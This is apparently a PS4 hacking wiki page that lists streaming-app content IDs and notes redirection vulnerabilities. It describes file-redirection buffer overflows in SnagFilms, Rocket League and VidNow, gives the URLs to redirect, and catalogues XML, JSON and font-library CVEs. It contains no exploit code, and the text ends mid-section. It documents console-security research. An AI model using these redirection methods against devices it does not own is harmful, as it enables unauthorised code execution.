UP2112-CUSA00959_00-ECHOVIRTUALJOEY1
Uses Trilithium on PS4.
"All Trilithium libraries are built to run on PS4 firmware version 1.750.x"
DISH Network LLC, often referred to as DISH, an abbreviation for Digital Sky Highway, formerly EchoStar Communications Corporation and DISH Network Corporation

Twitch
UP8902-CUSA03285_00-TWITCHPS4APPSCEA
EP8816-CUSA03398_00-TWITCHPS4APPSCEE
HP8901-CUSA03408_00-TWITCHPS4APPASIA
1.00: Does not require PSN connection. Not vulnerable to redirection.
1.60: Requires PSN connection.

Eros Now
CUSA01143
CUSA01420

ADN
EP8838-CUSA08223_00-ADNSTREAMINGPROD
not vulnerable
ADN stands for Animation Digital Network.

dアニメストア (Docomo Anime Store)
JP6553-CUSA26248_00-DANIMESTORE20212
1.00: Requires PSN connection.

TELEFOOT
CUSA26253 (FR)
Téléfoot: La Chaîne du Foot (English: The Football Channel), also known as simply Téléfoot, was a French pay television channel owned by Mediapro.

カラオケ＠DAM
JP1919-CUSA05864_00-0000000000000000

Spotify
EP4950-CUSA01780_00-0000000000000000
Has a DRM Free license.
Requires PSN connection.

EPIX
UT9003-CUSA00098_00-EPIXHD0000001003 (US)
Base package and patch 1.01 require PS4 1.02.

Pluto TV
UP8809-CUSA04688_00-0000000000000001
EP6487-CUSA25431_00-0000000000000001
Uses WebMAF on PS3.

Max
UP2084-CUSA41487_00-0094093457586850
CUSA42548

ESPN
UP1082-CUSA20270_00-0000000000000001

WatchESPN
UP8813-CUSA05214_00-WATCHESPNPS40000

SBS ON DEMAND
EP4355-CUSA00686_00-SBSONF0000DEMAND (AUS)
Uses WebMAF on PS3.

Watchever
EP4378-CUSA00075_00-WATCHEVERFULL000 (Germany)
Publisher: Vivendi Mobile Entertainment SA

Apple TV
UP6366-CUSA24186_00-3916558842004169
EP6365-CUSA24386_00-6058076879904191
JP6285-CUSA24387_00-5680859308778810
HP6352-CUSA24388_00-0328908600007633

PeacockTV / Peacock
CUSA20557
CUSA20558
CUSA20559
UP8862-CUSA20387_00-PEACOCKTVSTPS4US
UP8862-CUSA50221_00-0309462738048841
CUSA44568

Funimation
CUSA02598
UP2203-CUSA01881_00-FUNIMATION123456 (AR, BR, CA, CL, CO, MX, PE, US)
CUSA24752
Uses WebMAF on PS3.

FunimationNow
EP8822-CUSA04858_00-FUNIMATIONNOW000
Uses WebMAF on PS3.

Disney+
UP1082-CUSA15607_00-0000000000000001
EP1006-CUSA15362_00-0000000000000000
CUSA23459
CUSA26917
CUSA33443
CUSA33445
CUSA41720
UP1082-CUSA17204_00-DISNEYPLUSBETA01
EP1006-CUSA17211_00-DISNEYPLUSBETA02
1.00: Does not require PSN connection. Not vulnerable to JS redirection.

Star+ / Alchemy
UP1082-CUSA28107_00-7671418034339914
UP1082-CUSA28332_00-5305941957191875
CUSA41721
Publisher: Disney Interactive Studios

myCANAL
EP6493-CUSA26941_00-5308998485411682 (FR)

FOD
CUSA49264 (JP)

Shahid / MBC Shahid
EP7275-CUSA40504_00-0092658479701111
CUSA29195
CUSA29238
Shahid offers a wide range of Arabic, Turkish, and Bollywood content, live sports coverage, and engaging entertainment for diverse audiences.

Blim
UP8846-CUSA15371_00-BLIM24I24I24I24I

Maxdome
EP4374-CUSA00115_00-MAXDOMEFULLAPP00 (Germany, Austria)
Uses WebMAF on PS3.

JOYN
EP4374-CUSA20658_00-JOYNLOVESDUCKS12

CBS NEWS
UP8815-CUSA05455_00-1001952457212975
Uses WebMAF on PS3.

CBS ALL ACCESS
UP8815-CUSA05365_00-CBSIALLACCESSPS4
Replaced by Paramount+.

TotalChannel
EP4419-CUSA00119_00-TOTALCHANNELFULL (Spain)

All 4
EP4449-CUSA00072_00-CHANNEL404OD0100 (UK)
Publisher: Channel 4 Ltd.
https://en.wikipedia.org/wiki/Channel_Four_Television_Corporation
Uses WebMAF on PS3.

NBA
UP8824-CUSA06566_00-NBAUSPS4TDBS0002
UP8832-CUSA06996_00-NBAINTERNATIONAL

NBA App
EP7470-CUSA30916_00-8836715750790605

NBA_PS4_QA_Beta / NBA App Beta
UP8832-CUSA42505_00-0173475854859593

NBA Rakuten
JA0016-CUSA17492_00-NBARAKUTEN000001

NBA Game Time
UP9002-CUSA00214_00-NBAGAMETIMEAPP00 (ARG, BRA, CAN, CHI, DOM, MEX, JP, US)
HA0002-CUSA00272_00-NBAGAMETIMEAPP00
Another name is NBA League Pass.

360Channel
JP3168-CUSA07366_00-0000000000000000

NHL.TV
UP9002-CUSA00241_00-NHLGAMECENTERPS4
UT0026-CUSA00448_00-NHLGAMECENTERPS4 (CAN, US)
CUSA24952
Another name is NHL GameCenter / NHL GameCenter LIVE.

MLB.TV
UT0016-CUSA00529_00-MLB0000000000001
UP0181-CUSA01974_00-MLBTVPS4US000001 (CAN, MEX, US)
HT0006-CUSA00881_00-MLB0000000000001
CUSA12144
MLB stands for Major League Baseball.
Base package requires PS4 2.00 or even less for US version.

JOYSOUND.TV Plus
JP0033-CUSA01039_00-JOYSOUND00001DSK (JP)
JP0033-CUSA01040_00-JOYSOUND000001DL (JP)

Qello Concerts
UT0021-CUSA00489_00-QELLO20130905001 (US)
EP4482-CUSA00696_00-QELLO20140814000 (UK)
Base package requires PS4 2.50 or even less for EU version.
Base package requires PS4 3.50 or even less for US version.

DAZN
UP8835-CUSA09505_00-PERFORMGROUP2016
EP8819-CUSA04225_00-PERFORMGROUP2016
EP8819-CUSA12373_00-PERFORMGROUP2016
JA0014-CUSA04681_00-PERFORMGROUP2016
CUSA12348
CUSA13444
CUSA13445
Uses WebMAF on PS3.

DAZN Beta
JA0014-CUSA05372_00-PERFORMGROUP2016
CUSA05769
Uses WebMAF on PS3.

ITVX
EP2488-CUSA46706_00-0795101898528822

ITVX Beta PS4
EP2488-CUSA46902_00-0383265784502709

TubiTV
UP8834-CUSA08686_00-TUBITVPS40000000
EP8397-CUSA37642_00-6958188345238050
Uses WebMAF on PS3.

U-NEXT
JA0018-CUSA08077_00-UNEXT00000000PS4
1.00: Requires PSN connection.

Hulu
UT0008-CUSA00131_00-TESSERACT0000001 (AR, BR, CA, CL, CO, MX, PE, US)
JA0002-CUSA00399_00-JP0FINAL0000HULU (JP)
CUSA07728
CUSA25618
CUSA25660

VUDU™ Movies & TV
UT0015-CUSA00096_00-VUDU000000000000 (US)

Cinépolis Klic
UP2191-CUSA01553_00-CINEPOLISKLICPS4
Uses WebMAF on PS3.

BBC iPlayer
EP4338-CUSA00122_00-IPLAYER0FULL0000 (UK)
Uses WebMAF on PS3.

BBC News
EP4338-CUSA00273_00-BBCNEWSAPPPS4000 (UK)
Uses WebMAF on PS3.

BBC Sport
EP4338-CUSA00116_00-BBCSPORTSAPPPS40 (UK)
Uses WebMAF on PS3.

UFC Fight Pass
UP7808-CUSA35488_00-UFCFIGHTPASSPS4A
EP7806-CUSA35489_00-UFCFIGHTPASSPS4E
JP7789-CUSA40221_00-0904559566457615
UP7808-CUSA39356_00-8604406226113266
HP7835-CUSA40222_00-0246437331084134
1.00: Requires PSN connection.

UEFA.tv
UP6546-CUSA25007_00-9386431800228708
EP6545-CUSA24969_00-1931314736371726
JP6475-CUSA25008_00-2869502240368023
HP6543-CUSA25009_00-0677080904111109
1.00: Requires PSN connection.

CuriosityStream
UP6945-CUSA27570_00-8560825383884612
UP6945-CUSA27570_00-8560825383884666
EP6940-CUSA27673_00-2096736853346212
JP6908-CUSA27674_00-8991006826220300
HP6960-CUSA27675_00-0070467990501643

KinoPoisk
EP6561-CUSA25137_00-7980329373497494 (RU)
Publisher: Yandex LLC
KinoPoisk is a Russian subscription-based video-on-demand streaming service.

Crave
UP6552-CUSA25039_00-0226330061472406 (CAN)
Crave is a Canadian subscription-based video-on-demand streaming service formally known as Crave TV.

Optus Sport
EP6635-CUSA25743_00-2189903847317811 (Australia)
CUSA44440
Publisher: SINGTEL OPTUS PTY LTD
Optus Sport was an Australian group of sports channels, owned by Optus.

Eurosport Player
EP8844-CUSA10874_00-EUROSPORTPS40000

discovery+ / Stream TV Shows
EP8844-CUSA40527_00-0274016613257404

Ginx
CUSA04052
https://ginx.tv

AquaTV
EP0803-CUSA06950_00-1000000000AQUATV
UP0806-CUSA09672_00-1000000000AQUATV
CUSA07227

RTL+ / RTLHU
EB0462-CUSA44858_00-0696802195477560

Molotov
EP8826-CUSA33293_00-8959089505093987
CUSA05419

Fox Sports Now
CUSA06217

Within
EP2869-CUSA07204_00-WITHINUNLIMITED4
UP8820-CUSA05883_00-WITHINUNLIMITED4

Allumette
EP2893-CUSA06821_00-PENROSEALLUMETTE
UP8818-CUSA05884_00-PENROSEALLUMETTE
HP8910-CUSA06558_00-PENROSEALLUMETTE

Aquarion EVOL
JP1610-CUSA06827_00-AQUARIONVRPLUS00

ROGERS ANYPLACE TV
CUSA05366

bilibili (Simplified Chinese)
HP7587-CUSA37195_00-9940123657245032
Available on China PS Store theoretically.

Player Feedback Program
UP0006-CUSA05171_00-MADDENNFL17BETA1

E3
UP9000-CUSA00752_00-PLAYSTATIONATE30
E3 2014

francetv sport
EP8828-CUSA05696_00-FRANCETVSPORT000

Mad TV
CUSA01481

Al Jazeera
CUSA01484

Powers (TV Show)
EP9000-CUSA01755_00-0000000000000000

SiriusXM Radio
UP8814-CUSA05068_00-SIRIUSXMRADIOPS4
Uses WebMAF on PS3.

HKTV Television
HT5002-CUSA01980_00-HKTV000000000001 (HK)

UKTV
CUSA03115

AOL On
UP2208-CUSA01987_00-AOLON20150112001
Uses WebMAF on PS3.

Viafree
EP4345-CUSA18229_00-4685259000338822
Viaplay Group previously operated Viafree, a free streaming service (AVOD) in Denmark, Finland, Norway and Sweden. On 29 November 2021, NENT Group announced that Viafree will soon to be part of Paramount Global (under Pluto TV).

Paramount+
CUSA27830
CBS All Access and Paramount+ are both streaming services owned by ViacomCBS, offering a wide range of content including TV shows, movies, and original programming. While CBS All Access primarily focuses on CBS network content, Paramount+ expands its library to include content from other ViacomCBS-owned networks such as MTV, Nickelodeon, and Comedy Central.

Eurogamer
CUSA02061

RTVE +tdp
EP4490-CUSA03741_00-00000TELEDEPORTE (Spain)

Screambox
UP8803-CUSA03846_00-SCREAMBOXPS42015

tenplay
CUSA07788 (Australia)
10 (formerly, and commonly referred to as Tenplay or 10Play) is an Australian free video on demand and catch-up TV service run by Network 10.
https://en.wikipedia.org/wiki/10_(VoD_service)

AMPYA
CUSA04130 (Germany)
AMPYA was an Internet-based music video platform with a range of about 130,000 titles, which was operated by TVRL GmbH, which belongs to ProSiebenSat.1 Media and is based in Cologne (Germany) and operationally belonged to MyVideo. The service was available via web browser, mobile devices and the HbbTV service of the ProSiebenSat.1 broadcasting group.
https://www.p3-ds.com

Sportsnet
UP8838-CUSA11301_00-SPORTSNETPS00000

GoPro
UP8807-CUSA04180_00-GOPROAPPPS400000

shomi
UP8808-CUSA04223_00-SHOMIPS4APP00000

HollyStar
CUSA05143

NBC Sports
UP8839-CUSA11553_00-NBCUAPPSPORTSPS4

SHOWTIME
UP8863-CUSA20592_00-SHOWTIMEOTT00001

Showtime Anytime
UP8863-CUSA20593_00-SHOWTIMEANYTIME1

RaiPlay
EB0192-CUSA43569_00-0995285609837835

Premium Online
CUSA03852

Premium Play
CUSA03876

BT Sport
EP8846-CUSA14890_00-2819123350041251
BT Sport was rebranded into TNT Sports.

Anime Japan - AJ Night 2016 - PlayStation Plus Edition
JP9002-CUSA05081_00-MUSICAJNIGHT2016

Perfect
EP4114-CUSA06951_00-PERFECT000000000
UP2985-CUSA06957_00-ASIAPERFECT00000
UP2985-CUSA06957_00-JPPS400000000001
UP2985-CUSA06957_00-PERFECT000000000

Premium Musical Notes: Japan Studio Music Festival
JP9002-CUSA09075_00-JS2DVOL000000001
JP9002-CUSA10122_00-JS2DVOL000000002
JP9002-CUSA10122_00-ASIA000000000000

Star Chart
CUSA10395

Gundam Build Fighters: Battlogue
CUSA12617
EP0700-CUSA12618_00-GBFBTL0000000001
JP0700-CUSA12833_00-GBFBTL0000000001
HP0700-CUSA12832_00-GBFBTL0000000001
UP0700-CUSA12754_00-GBFBTL0000000001
Anime series as an application for PS4.

NNNN - Original Soundtrack
UP6347-CUSA33774_00-NNNNORSOUNDTRACK
EP6346-CUSA33940_00-NNNNSOUNDTRACKEU

Ars Regia OST
UP6347-CUSA33954_00-ARSREGIASNDTRACK
EP6346-CUSA33955_00-ARSREGIASNDTRKEU

Internal applications:

Inside Playstation
EP8945-CUSA07357_00-INSIDEPLAYSTATIO

Trend Micro Web Security Service
UT0014-CUSA01471_00-B000000000001097
UT0014-CUSA01471_00-TRIAL10000000000
EP4536-CUSA01491_00-TRIAL00000000001
EP4536-CUSA01491_00-BUNDLE0000000001
JA0007-CUSA01482_00-ASIA000000BUNDLE
JA0007-CUSA01482_00-ASIA0000000TRIAL

Media Player
IP9100-CUSA02012_00-PS4MEDIAPLAYER00

THE PLAYROOM
IP9100-CUSA00001_00-PLAYROOM00000000
Has a DRM Free license.

SHAREfactory™
IP9100-CUSA00572_00-JPSFRELE00000000 (JP)
IP9100-CUSA00572_00-ASIASFRELE000100 (HK, ID, KR, MY, SG, TW, TH)
IP9100-CUSA00572_00-SFRELE0000000100 (AR, BR, CA, CL, CO, MX, PE, US)
IP9100-CUSA00572_00-EURELE0000000100 (AU, BH, BE, BG, HR, CY, CZ, DK, DE, ES, FI, FR, GB, GR, HU, IS, IN, IE, IL, IT, KW, LB, LU, MT, NL, NZ, NO, AT, OM, PL, PT, QA, RO, RU, SA, CH, SE, SK, SI, TR, UA, AE, ZA)

SHAREfactory™ Dev
IP9100-NPXS27009_00-SFEDIT0000000100
Has a DRM Free license.

Sony Crackle - Free Movies and TV
US0007-CUSA00059_00-CRACKLEPS4TRILIT (CAN, MEX, US)
US0007-CUSA09314_00-CRACKLPS4ALWZSVD
CUSA43433
CUSA43434
Uses Trilithium.

WEBMAF_DEFAULT
EP9009-CUSA00061_00-WEBMAF000DEFAULT
Publisher: SCEE R&D
Uses WebMAF.

Sony Pictures Core
CUSA44892
UB0287-CUSA44977_00-NEXUSSPHE0000000
UB0287-CUSA44977_00-0209674748851116
CUSA44978
CUSA44979
CUSA44980
Uses WebKit.
https://www.sonypicturescore.com
https://www.playstation.com/en-us/sony-pictures-core

BRAVIA TV Player
JA0001-CUSA02215_00-BRAVIATVPLAYER01
EP4288-CUSA02106_00-BRAVIATVPLAYER01
HA0001-CUSA03878_00-BRAVIATVPLAYER01

PlayStation™HEROES
UP9000-CUSA01087_00-GAMINGFORGOOD015

PlayStation® Access
EP9000-CUSA02464_00-PSACCESSAPP00000

PlayStation™Vue
UT0016-CUSA00960_00-COBRAPCKGE000000 
User-Agent: Mozilla/5.0 (PLAYSTATION 4;1.00)
Has a DRM Free license.
Requires PSN connection and network connection.
https://web.archive.org/web/20160302084629/https://www.playstation.com/en-us/network/vue
https://web.archive.org/web/20190723063849/https://www.playstation.com/en-us/network/vue

PlayStation Now
IP9100-CUSA01697_00-SFPROD0000000000.pkg

Cloud TV Test
UT0016-CUSA00644_00-COBRAPCKGE000000
Probably has a DRM Free license.
Patch 1.01 requires PS4 1.70 but even lower for base package.

torne™ PlayStation®4
JA0003-CUSA00442_00-TORNEPS400000000

PlayMemories Online
JA0001-CUSA00256_00-PLAYMEMORIES0001 (JP)
HA0001-CUSA00354_00-PLAYMEMORIES0001 (HK, ID, KR, MY, SG, TW, TH)
UT0014-CUSA01263_00-PLAYMEMORIES0001 (AR, BR, CA, CL, CO, MX, PE, US)
EP4288-CUSA00423_00-PLAYMEMORIES0001 (AU BH BE BG HR CY CZ DK DE ES FI FR GB GR HU IS IN IE IL IT KW LB LU MT NL NZ NO AT OM PL PT QA RO RU SA CH SE SK SI TR UA AE ZA)
CUSA00351

Live Events Viewer
UT0016-CUSA00658_00-0000000000000000 (US)
Patch 1.06 requires PS4 3.00 but even lower (?1.70?) for base package.
Uses libjscore on PS3.

Conversations with Creators
UT0016-CUSA03141_00-CONVOSWICREATORS

PDP Cloud Remote App
CUSA10091
CUSA10889
UP2520-CUSA10894_00-CLOUDRMTAPP00000
EP2383-CUSA14586_00-CLOUDRMTAPP00000
The Cloud Remote uses Bluetooth® wireless technology to manage media playback of PS4 streaming and live apps, and includes controls for power, input, and volume for TVs. Programming the remote is straightforward with the downloadable PDP Cloud Remote App, which uses advanced Cloud technology to auto-detect devices connected to the PS4 for hassle-free remote programming.
Formerly: https://www.pdp.com/cloud-remote
https://support.turtlebeach.com/s/article/Cloud-Remote-for-PlayStation-4-User-Guide
https://turtlebeach.my.salesforce.com/sfc/p/#U0000000Jga6/a/UR000003o8S5/k0oTed5cKC7.EEUQcbEUDSrxsS.xaVHeXA5qLHkoBQU
https://www.youtube.com/watch?v=8WHsSI9pRgM

File redirection with impact[edit | edit source]

SnagFilms[edit | edit source]

A vulnerability is present in the SnagFilms application, downloadable from the PS Store on regions AR, BR, CA, CL, CO, MX, PE, US. Its Content ID is UP2156-CUSA01206_00-SNAGFILMPS4RC001.

Arbitrary code execution in memory has been demonstrated, although so far the system will throw an exception in the program's memory before the payload finishes loading.

If you craft a small enough payload and/or a payload that loads without causing an exception in program memory, you can most likely get usermode code execution.

https://www.psdevwiki.com/ps4/File:5OrSFCa.jpg

BattleCars Exploit (Buffer Overflow via network in Rocket League)[edit | edit source]

Back in time, a buffer overflow affected the most recent application version of Rocket League (1.03), even on the latest System Software version of the time (2.57).

Firstly, block all requests from: https://patch103-dot-psyonix-rl.appspot.com/

When you launch Rocket League, it downloads a stub file from: http://psyonix-rl-529970.c.cdn77.org/BC2/versions/103/config/BattleCars_Prod/client.bin

You can redirect this URL to load a huge file and/or a specifically crafted payload instead of the stub. If you use the proper file, it does not need to be that large, the example below is under 9 MB.

Your file will be loaded into memory, when the file is large enough/a game is played and/or you wait enough time, you can consistently cause a buffer overflow and the application will crash.

Depending on how you craft your payload, you may or may not have to do any of that get it working. There are no checks performed at all on file size, content, etc.

Staying on the start screen for long enough can also trigger it. If your payload is not created properly, it will take much longer to execute.

If you are having problems getting this working, you can use the example file, causing an almost instant buffer overflow upon launch of the application.

If your payload is crafted properly, you should be able to get it working within 10-20 seconds of launching the application.

A carefully crafted file may be able to exploit this or similar bugs to gain code execution, among other things. It may also be possible to alter gameplay via similar methods.

No payload will be provided at the moment because this is very experimental.

VidNow (TCP Buffer Overflow)[edit | edit source]

A possible exploit has been found in VidNow ?or VidZone? application downloadable from the PS Store.

UT4071-CUSA00237_00-0000000000000000 (Australia, NZ)
EP4071-CUSA00235_00-0000000000000000 (Austria, Belgium, Denmark, Finland, France, Germany, Ireland, Italy, Luxembourg, Netherlands, Norway, Portugal, Spain, Sweden, Switzerland, UK)

https://blog.playstation.com/archive/2013/12/05/vidzone-arrives-on-ps4-this-is-for-the-music-video-players

PATCHED: Sony has hotfixed this exploit via content hashing the file while in transit. Some people have managed to reverse the hotfix but the method is not known. The PS4 checks the content hash HTTP header from the HMAC header.

When you launch VidNow for the first time it gets http://sceecatalogs.vidzone.tv/386/vidzone_386_US.db.psarc (or http://sceecatalogs.vidzone.tv/469/vidzone_469_US.db.psarc depending on the version). This file is 5 MB big. This file loads into a 60 kB TCP buffer. No checks are done at all on the files sizes/hashes/contents. Therefore, it is possible to redirect VidNow to load a substitute file. When VidNow is redirected to load a large enough file the TCP Window buffer is overrun, somewhere between bytes 34,125,000 and 35,000,000 of the substitute file. Despite the buffer overflow and crash, the substitute data is still transmitted and the application only throws the exception when another TCP packet is sent. As a result, the application crashes and the console locks up for a minute. Directly before the console resumes normal operations after the crash, an unusually large number of TCP (RST) packets are sent. While no exploit that makes use of this crash is currently available, a carefully crafted file may be able to exploit this or similar issues to gain usermode ROP code execution, among other things.

Note: a related DRM file was available at: http://sceeassets.vidzone.tv/High/000/000/012/524/12524.drm.

Crash Timeline[edit | edit source]

17:17:39.899984000 Request
17:17:40.000655000 Request
17:17:40 (System locks up) Crash
17:17:44.957274000 Response
17:17:48.500481000 Response
17:17:48.500567000 Response
17:17:50.356427000 (System no longer locked up) Console Regains Control (74 byte packet sent)
17:17:50.357555000 Contacts Crashlog Server / System Operation Resumes

File injection without impact[edit | edit source]

Headset Companion
EP9000-CUSA00468_00-HEADSETCOMPANION
UP9000-CUSA00372_00-HEADSETCOMPANION
JP9002-CUSA05062_00-HEADSETCOMPANION
HP9010-CUSA03386_00-HEADSETCOMPANION
PS4Application libhttp/1.000 (PS4) libhttp/6.51 (PlayStation 4)
vulnerable to .json and .xml injection

Crunchyroll
UP2074-CUSA00095_00-201310082029XXXX (ARG, BRA, CAN, CHL, COL, MEX, PER, US)
EP8805-CUSA02644_00-20150410XCRUNCHY
CUSA39533
CUSA39534
PS4Application libhttp/1.000 (PS4) libhttp/6.51 (PlayStation 4)
.txt file injection

VRV
UP8826-CUSA06551_00-20161004AAAABBBB
VRV was a subscription video streaming service that includee on-demand access to a large library of anime titles and cult favorites. All its content now lives at Crunchyroll.
https://www.youtube.com/watch?v=CX5bAmt3I-M

PlayStation® F.C.
EP9000-CUSA02865_00-0000000000000000
image: SCEE/cm (PLAYSTATION 4;1.00) libhttp/6.51 (PlayStation 4)
PSARC: Tonga (PLAYSTATION 4;1.00) libhttp/6.51 (PlayStation 4)
not vulnerable, or only PSARC injection of JSON
http://scee.dl.playstation.net.edgesuite.net/psfc/catalogue2.master.psarc
PSARC embeds JSON

RCE in Neverwinter Nights: Enhanced Edition multiplayer mode[edit | edit source]

Neverwinter Nights: Enhanced Edition is a game available on the PS4 PS Store.

Its Content ID is UP0346-CUSA15670_00-NWNEEONCOLSOLEPS for the American version, and EP0343-CUSA15938_00-NWNEEONCOLSOLEPS for the European version.

It is unknown if the PS4 version of Neverwinter Nights: Enhanced Edition has a multiplayer mode that can be hijacked like in the PC version of the game.

Usermode (WebKit)[edit | edit source]

See WebKit Bugs.

Usermode (untested attack vectors)[edit | edit source]

Leap second 23:59:60 software bug[edit | edit source]

Leap second 2015 June 30, 23h 59m 60s should theoretically not be a problem, since PS4 is based on BSD which can implement 23:59:60.

How many seconds are in a day? If you guessed 86,400, you’d be right—except on June 30, 2015, when an extra second is being added to the clock. This additional unit of time, dubbed a “leap second,” is meant to account for a naturally-occurring slowing of the Earth’s rotation. But the extra second could cause headaches for computer systems, which aren’t ready to deal with 61 seconds in a given minute.

The problem is reminiscent of Y2K, that turn-of-the-century panic when companies worried their computers would go haywire because they recognized the year 2000’s double-zero ending as “1900.”

While no one is predicting this year’s leap second to cause a tech apocalypse like they did fifteen years ago, there’s a chance the leap second could crash your favorite website or maybe even delay your flight.

Oldest games and applications[edit | edit source]

Oldest games and applications may have ASLR disabled, just like on PS Vita (see h-encore exploit), which would make exploitation easier.

Contrast[edit | edit source]

Contrast (CUSA00011) requires PS4 System Software 1.02. It has no disc version but is still available on the PS Store to buy a license. Contrast uses Unreal Engine 3 which is the precursor of Unreal Engine 4, and was also used a lot for PS3 games, including some exploitable ones.

Unity game engine[edit | edit source]

System.Xml.XmlTextReader[edit | edit source]

Unity uses .NET 2.0, and all versions of this library prior to 4.5.2 are vulnerable to XML External Entity (XXE) attacks, so if you can get user input into one of these you can get XXE.

Various Unity bugs[edit | edit source]

XML: libxml2[edit | edit source]

libxml2 is one of the most widely used software libre XML parsers.

Used in PS4 [3]
Source code [4]

List of most vulnerabilities fixed in libxml2[edit | edit source]

[5]
CVEs are well described in libxml2 changelog
[6]
CVE Mitre list of libxml2 CVEs
[7]

CVE-2025-24928[edit | edit source]

libxml2 before 2.12.10 and 2.13.x before 2.13.6 has a stack-based buffer overflow in xmlSnprintfElements in valid.c. To exploit this, DTD validation must occur for an untrusted document or untrusted DTD. NOTE: this is similar to CVE-2017-9047.

CVE-2013-0338 / CVE-2013-0339[edit | edit source]

Credits:

Sebastian Pipping (hartwork)

CVE-2013-0338 - libxml2 internal entity expansion
CVE-2013-0339 - libxml2 external entities expansion

[8]
[9]

XML: Expat XML Parser[edit | edit source]

libexpat is a fast streaming XML parser. Alongside libxml2, Expat is one of the most widely used software libre XML parsers written in C, specifically C99. It is cross-platform and licensed under the MIT license.

Used in PS4 [10]
Source code [11]
Documentation [12]
https://marc.info/?l=oss-security&w=2&r=1&s=expat&q=b

List of most vulnerabilities fixed in Expat XML[edit | edit source]

CVEs are well described in Expat XML changelog
CVE Mitre list of Expat XML CVEs
[13]

CVE-2024-8176[edit | edit source]

A stack overflow vulnerability exists in the libexpat library due to the way it handles recursive entity expansion in XML documents. When parsing an XML document with deeply nested entity references, libexpat can be forced to recurse indefinitely, exhausting the stack space and causing a crash. This issue could lead to denial of service (DoS) or, in some cases, exploitable memory corruption, depending on the environment and library usage.

Fixed in Expat XML 2.7.0.

CVE-2022-25315[edit | edit source]

Credits:

Samanta Navarro (ferivoz)

In Expat XML, it is possible to use an integer overflow in storeRawNames for out of boundary heap writes. Default configuration is affected. If compiled with XML_UNICODE then the attack does not work.

[17]

Fixed in Expat XML 2.4.5.

CVE-2022-25313[edit | edit source]

Credits:

Samanta Navarro (ferivoz)

In libexpat before 2.4.5, an attacker can trigger stack exhaustion in build_model via a large nesting depth in the DTD element.

[18]
[19]

Fixed in Expat XML 2.4.5.

CVE-2022-25235 / CVE-2022-25236 - Expat XML insufficiently sanitizes tag and attribute names[edit | edit source]

CVE-2022-25235: xmltok_impl.c in libexpat before 2.4.5 lacks certain validation of encoding, such as checks for whether a UTF-8 character is valid in a certain context.

CVE-2022-25236: xmlparse.c in libexpat before 2.4.5 allows attackers to insert namespace-separator characters into namespace URIs.

[20]

Fixed in Expat XML 2.4.5.

CVE-2022-23852[edit | edit source]

Expat XML has a signed integer overflow in XML_GetBuffer, for configurations with a nonzero XML_CONTEXT_BYTES.

libexpat is susceptible to a software flaw that causes process interruption. When processing a large number of prefixed XML attributes on a single tag can libexpat can terminate unexpectedly due to integer overflow. The highest threat from this vulnerability is to availability, confidentiality and integrity.

Fixed in Expat XML 2.4.4.

CVE-2022-22822[edit | edit source]

addBinding in xmlparse.c in libexpat before 2.4.3 has an integer overflow.

This is an important rather than a critical vulnerability due to its practical limitations. The flaw arises from unsafe left-shift operations in storeAtts() within libexpat, which, under extreme conditions (e.g., over 229 prefixed attributes), can lead to undefined behavior, memory mismanagement, and denial-of-service (DoS). However, exploitation requires specially crafted XML payloads several gigabytes in size (~6.5 GiB), which makes remote exploitation unlikely in real-world environments due to common upload limits and resource constraints. There is no evidence of arbitrary code execution, memory corruption leading to privilege escalation, or data leaks.

[24]
[25]

Fixed in Expat XML 2.4.3.

CVE-2021-45960[edit | edit source]

In libexpat before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory).

Fixed in Expat XML 2.4.3.

CVE-2013-0340 / CVE-2013-0341[edit | edit source]

Credits:

Sebastian Pipping (hartwork)

CVE-2013-0340 - expat internal entity expansion
CVE-2013-0341 - expat external entities expansion

Expat XML 2.4.0 fixes long known security issue CVE-2013-0340 by adding protection against so-called Billion Laughs Attacks, a form of denial of service against applications accepting XML input, in all known variations, including recent flavor Parameter Laughs.

Fixed in Expat XML 2.4.0.

XML Billion laughs attack[edit | edit source]

https://en.wikipedia.org/wiki/Billion_laughs_attack

JSON: cJSON[edit | edit source]

Used in PS4 [29]

CVE-2022-24384 - Heap overflow in Lua implementation of cJSON[edit | edit source]

It is probably not applicable to many systems since it either requires to get Lua code execution, which often is jackpot because of many Lua exploits, or to control input of a program that parses JSON using a component written in Lua.

CVE-2016-10749 - Buffer overflow in parse_string() when last input character is a backslash[edit | edit source]

Credits: Marco Grassi (marcograss) for discovery and disclosure, Max Bruckner (FSMaxB) for the fix

There is a buffer out of bound read problem in cJSON.

Fixed in cJSON 1.7.5. May affect PS4 til System Software version around 4.01.

CVE-2016-4303 - parse_string() mishandles UTF8/16 strings[edit | edit source]

[38]

Fixed in cJSON 1.7.5. May affect PS4 til System Software version around 4.01.

JSON: JSON for Modern C++[edit | edit source]

Used in PS4 [39]
Source code [40]
Documentation [41]
Changelog contains a list of bugs

JSON: Newtonsoft.Json[edit | edit source]

Used in PS4 [42]

JSON: System.Json[edit | edit source]

Used in PS4 [43]
Probably Sony's own implementation of JSON, named SceLibJson.
It could be inspired by existing JSON parsers like json-c, JSON.NET, JSON C++, jsonxx, Boost.JSON, etc.

CLAPACK[edit | edit source]

Used in PS4 [44]

CVE-2021-4048[edit | edit source]

Font: FreeType 2[edit | edit source]

FreeType 2 is included in the PS4 OS [47] as a system library in the following modules:

/system/common/lib/libSceFreeTypeOt.sprx (library name: libSceFreetype), SCE_SYSMODULE_FREETYPE_OT = 0x99, Font driver for the Font library (OpenType only)
/system/common/lib/libSceFreeTypeOl.sprx, SCE_SYSMODULE_FREETYPE_OL = 0x9A, Font driver for the Font library (overall outline fonts including OpenType)
/system/common/lib/libSceFreeTypeOptOl.sprx, SCE_SYSMODULE_FREETYPE_OPT_OL = 0x9B, Font driver for the Font library (outline fonts other than OpenType)

It may be needed to load other font related libraries like:

/system/common/lib/libSceFont.sprx, SCE_SYSMODULE_FONT = 0x0084, Font library
/system/common/lib/libSceFontFt.sprx, SCE_SYSMODULE_FONT_FT = 0x0098, Font interface for the Font library
/system/common/lib/libSceWkFontConfig.sprx, SCE_SYSMODULE_RESERVED26 = 0x00E9

To use such libraries you must load it before calling any FreeType function by calling:

sceSysmoduleLoadModule(SCE_SYSMODULE_FREETYPE_OL);

Thanks to libSceFreetype you can load .ttf and .ttc files.

FreeType 2 is loaded by the Internet Browser to display fonts, notably by loading .ttf files in HTML pages.

FreeType <= 2.13.0 - OOB write (CVE-2025-27363)[edit | edit source]

Analysis[edit | edit source]

Bug description[edit | edit source]

